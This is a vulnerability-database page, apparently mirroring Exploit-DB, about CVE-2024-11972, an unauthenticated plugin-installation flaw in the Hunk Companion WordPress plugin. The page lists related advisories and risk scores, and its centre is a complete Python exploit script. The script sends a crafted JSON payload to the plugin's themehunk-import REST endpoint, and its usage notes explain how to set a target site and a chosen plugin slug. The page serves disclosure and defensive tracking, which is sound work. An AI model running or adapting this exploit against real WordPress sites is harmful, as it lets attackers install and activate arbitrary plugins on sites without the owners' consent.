Hunk Companion Plugin 1.9.0 - Unauthenticated Plugin Installation

🗓️ 18 Apr 2025 00:00:00Reported by Jun TakemuraType

exploitdb🔗 www.exploit-db.com👁 261 Views

Exploiting Hunk Companion Plugin 1.9.0 for unauthenticated plugin installation on WordPress sites.

Reporter	Title	Published	Views	Family All 26
GithubExploit	Exploit for CVE-2024-11972	15 Dec 202423:54	–	githubexploit
GithubExploit	Exploit for CVE-2024-11972	29 Jan 202521:17	–	githubexploit
GithubExploit	Exploit for CVE-2024-11972	13 Jan 202515:44	–	githubexploit
Information Security Automation	New episode “In The Trend of VM” (#11): vulnerabilities that became trending in December and the final report on trending vulnerabilities for 2024	18 Feb 202517:28	–	avleonov
Information Security Automation	About Authentication Bypass – Hunk Companion WordPress plugin (CVE-2024-11972) vulnerability	11 Jan 202512:41	–	avleonov
BDU FSTEC	The vulnerability of the permission_callback function in the Hunk Companion plugin of the WordPress content management system allows a hacker to execute XSS attacks.	19 Dec 202400:00	–	bdu_fstec
Circl	CVE-2024-11972	12 Dec 202408:18	–	circl
CNNVD	WordPress plugin Hunk Companion 安全漏洞	31 Dec 202400:00	–	cnnvd
CVE	CVE-2024-11972	31 Dec 202406:00	–	cve
Cvelist	CVE-2024-11972 Hunk Companion < 1.9.0 - Unauthenticated Plugin Installation	31 Dec 202406:00	–	cvelist

# Exploit Title: Hunk Companion Plugin 1.9.0 - Unauthenticated Plugin Installation
# Date: 16 December, 2024
# Exploit Author: Jun Takemura
# Author's GitHub: https://github.com/JunTakemura
# Author's Blog: juntakemura.dev
# Vendor Homepage: https://themehunk.com
# Software Link: https://wordpress.org/plugins/hunk-companion/
# Version: Tested on Hunk Companion 1.8.8
# CVE: CVE-2024-11972
# Vulnerability Description:
#     Exploits a flaw in the Hunk Companion plugin's permission_callback for the
#     /wp-json/hc/v1/themehunk-import endpoint, allowing unauthenticated attackers
#     to install and activate arbitrary plugins from the WordPress.org repository.
# Tested on: Ubuntu
# Original vulnerability discovered by: Daniel Rodriguez
#
# Usage:
#     1. Update `target_url` below with the target WordPress site's URL.
#     2. Update `plugin_name` with the slug of the plugin you want to install.
#     3. Run: python3 exploit.py
#
import requests
from urllib.parse import urljoin

# Update 'URL' with your target WordPress site URL, for example "http://localhost/wordpress"
target_url = "URL"

# Update 'NAME' with desired plugin's name (slug), for example "wp-query-console"
plugin_name = "NAME"

endpoint = "/wp-json/hc/v1/themehunk-import"
url = urljoin(target_url, endpoint)

payload = {
    "params": {
        "plugin": {
            plugin_name: "Plugin Label"
        },
        "allPlugins": [
            {
                plugin_name: f"{plugin_name}/{plugin_name}.php"
            }
        ],
        "themeSlug": "theme",
        "proThemePlugin": "plugin",
        "templateType": "free",
        "tmplFreePro": "theme",
        "wpUrl": target_url
    }
}

headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64)",
    "Content-Type": "application/json"
}

try:
    response = requests.post(url, json=payload, headers=headers, timeout=10)
    response.raise_for_status()  # Raises an HTTPError if the response is not 2xx

    print(f"[+] Exploit sent successfully.")
    print(f"Response Status Code: {response.status_code}")
    print(f"Response Body: {response.text}")
except requests.exceptions.RequestException as e:
    print(f"[-] Request failed: {e}")

18 Apr 2025 00:00Current

7.4High risk

Vulners AI Score7.4

CVSS 3.19.8

EPSS0.54754

SSVC